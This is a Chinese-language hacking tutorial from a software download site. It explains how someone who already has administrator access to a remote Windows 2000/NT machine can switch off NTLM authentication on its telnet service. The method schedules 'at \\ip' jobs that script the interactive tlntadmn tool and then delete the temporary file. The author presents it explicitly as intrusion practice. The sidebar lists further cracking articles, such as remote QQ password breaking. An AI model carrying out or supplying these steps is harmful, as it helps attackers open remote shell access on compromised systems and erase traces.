| VB 源码 | VC 源码 | ASP源码 | JSP源码 | PHP源码 | CGI源码 | FLASH源码 | 素材模板 | C 源程序 | 站长工具 | 站长教程 |

安全防范

木马病毒
黑客技术
系统安全
防火墙
安全防范

本类阅读TOP10

·双网卡共享上网解析
·常用端口对照详解
·技巧:多种途径访问局域网中的计算机
·代理服务器使用祥解
·在家远程控制公司的局域网电脑
·在Windows XP中共享上网
·最新奇迹私服复制漏洞大全(含98c)
·为什么局域网中机器PING通却不能上网?
·局域网共享资源安全防护大全
·远程破OICQ密码给工具QQExplorer ver 1.25介绍

站内搜索

不需要任何工具,远程屏蔽telnet服务的ntlm认证

很多人获得上传文件的权限和管理员权限以后想启动远程的tlelnet服务,但是却碰到 
讨厌的NTLM认证,对于这种情况,我们很多时候就采用上传文件(比如NTLM.exe),然后at远程定时执行,如果手头上没有这样的工具怎么办呢? 
可以这么做: 
大家可以看一下win2000和nt4自带tlntadmn这个命令,他是用来控制台修改telnet设置的,很可惜这是一个控制台的交互式工具,所以at命令没有办法直接调用。 
现在我们执行一下tlntadmn,然后按照以下的顺序操作 
停止服务(5)->更改设置(3)->NTLM(7)->确认更改(y)->修改NTLM当前值(0)->再次确认(y)->退出菜单(0)->启动服务(4)->退出程序(0) 
现在大家记住了吧,先后顺序是5(回车)3(回车)7(回车)y(回车)0(回车)y(回车)0(回车)4(回车)0(回车) 
线在我们这么做 
at \\ip time "echo 5 > c:\t.txt" 
at \\ip time "echo 3 >> c:\t.txt" 
at \\ip time "echo 7 >> c:\t.txt" 
at \\ip time "echo y >> c:\t.txt" 
at \\ip time "echo 0 >> c:\t.txt" 
at \\ip time "echo y >> c:\t.txt" 
at \\ip time "echo 0 >> c:\t.txt" 
at \\ip time "echo 4 >> c:\t.txt" 
at \\ip time "echo 0 >> c:\t.txt" 
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt" 
at \\ip time "del c:\t.txt /f" 
呵呵按照上面的顺序一步一步执行 
当然你本地做一个t.txt文件也可以,内容如下: 
5 
3 
7 
y 
0 
y 
0 
4 
0 
每个字符后面要加回车,然后copy t.txt \\ip\c$ 
然后再 
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt" 
at \\ip time "del c:\t.txt /f" 
很简单的dos重定向原理,t.txt就相当于手工输入一系列的操作,完成tlntadmn的交互 
呵呵 

当然,你们可以在本地试验好以后再发到远程主机去 
我写的那个sqlcandy远程启动telnet服务,删除ntlm认证就是这么做的 
当然有工具是最好了 
但是劝大家练习入侵的时候尽量不要使用工具,这样对自己没有帮助的 .:)




相关文章
  • 远程复制更省力 用CuteFTP实现FXP
  • ActivePerl PerlIS.dll 远程缓冲区
  • 远程破OICQ密码给工具QQExplorer ver 1.25介绍
  • 微软"帮助和支持中心"远程代码执行漏洞
  • 用ASP实现远程批量文件改名
  • 用ASP实现远程批量文件改名(一)
  • 用ASP实现远程批量文件改名(二)
  • 远程获取内容,并将内容存在本地电脑上,包括任何文件
  • 相关软件

  • 用Winsock实现远程聊天  
  • 远程文件管理系统 2.0
  • 远程桌面客户端
  • 远程注册程序  
  • 一个远程控制软件  
  • 远程注册  

  • 下载首页关于我们广告服务联系方式常见问题隐私声明法律条款本站声明下载帮助发布软件站点地图谷歌卫星地图